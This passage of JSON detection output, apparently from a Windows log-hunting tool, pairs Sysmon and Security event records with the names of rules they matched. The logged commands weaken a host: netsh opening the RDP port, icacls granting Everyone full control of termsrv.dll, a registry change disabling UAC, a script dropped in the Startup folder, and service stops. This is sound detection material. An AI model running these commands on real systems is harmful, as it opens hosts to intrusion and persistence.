Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107103","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769629,"Execution_attributes":{"ProcessID":584,"ThreadID":752},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:31:19.133272Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User 
Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107104","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769634,"Execution_attributes":{"ProcessID":584,"ThreadID":640},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:32:13.647155Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.526","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\install.bat","UtcTime":"2019-03-17 
20:17:44.526"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5252,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.537011Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.607","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPCheck.exe","UtcTime":"2019-03-17 20:17:44.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5253,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.637155Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 
20:17:44.777","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPConf.exe","UtcTime":"2019-03-17 20:17:44.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5254,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.797385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.458","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPWInst.exe","UtcTime":"2019-03-17 20:17:45.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5255,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.478364Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using 
NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.618","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\uninstall.bat","UtcTime":"2019-03-17 20:17:45.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5256,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.628580Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.648","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\update.bat","UtcTime":"2019-03-17 
20:17:45.648"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5257,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.648609Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"%%ProgramFiles%%\\RDP Wrapper\\rdpwrap.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\ServiceDll","UtcTime":"2019-03-17 20:18:05.086"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5265,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:05.086560Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Registry Modification","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000000)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5267,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5269,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port or Application Allowed","Netsh RDP Port 
Opening"],"event":{"Event":{"EventData":{"CommandLine":"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=784A50A6A09C25F011C3143DDD68E729,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst\" -i -o","ParentImage":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ParentProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ParentProcessId":3700,"ProcessGuid":"365ABB72-AB81-5C8E-0000-001024960C00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5270,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.312636Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant %%username%%:F","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010296C0D00","ProcessId":3536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.897"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5312,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.917561Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant *S-1-1-0:(F)","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010656E0D00","ProcessId":3652,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5313,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.927576Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000050)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"365ABB72-AC79-5C8E-0000-0010E1B50D00","ProcessId":2872,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber","UtcTime":"2019-03-17 
20:22:59.399"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5329,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:22:59.399761Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"PC01.example.corp","Correlation":null,"EventID":104,"EventRecordID":27736,"Execution_attributes":{"ProcessID":812,"ThreadID":3916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:34:25.894341Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"EXAMPLE","SubjectUserName":"user01"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-30 
10:12:45.583","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-1EFA-5CC8-0000-0010D3DE1C00","ProcessId":3292,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\bs.ps1","UtcTime":"2019-04-30 10:12:45.583"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":8930,"Execution_attributes":{"ProcessID":1956,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-30T10:12:45.583363Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"DFAE8213-70EB-5CDD-0000-0010F66D0A00","ProcessId":3788,"RuleName":"technique_id=T1088,technique_name=Bypass User Account Control","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA","UtcTime":"2019-05-16 14:17:15.758"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":13,"EventRecordID":18619,"Execution_attributes":{"ProcessID":1780,"ThreadID":2204},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-16T14:17:15.763712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Office 
Security Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","ProcessGuid":"365ABB72-92DF-5CDB-0000-0010A15E1300","ProcessId":3804,"RuleName":"Defense Evasion - access to the VBA project object model in the Macro Settings changed","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM","UtcTime":"2019-05-15 04:18:40.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":17915,"Execution_attributes":{"ProcessID":2024,"ThreadID":1212},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-15T04:18:40.474644Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HCJVGQ5XQYJQFTRJAKRF.temp","UtcTime":"2020-10-17 
16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419627,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.787882Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419628,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.791010Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc stop CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Service Control Manager 
Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"sc.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A17-5E76-0000-001062373A00","ProcessId":4876,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:35.023"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244333,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:35.026859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"net start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 
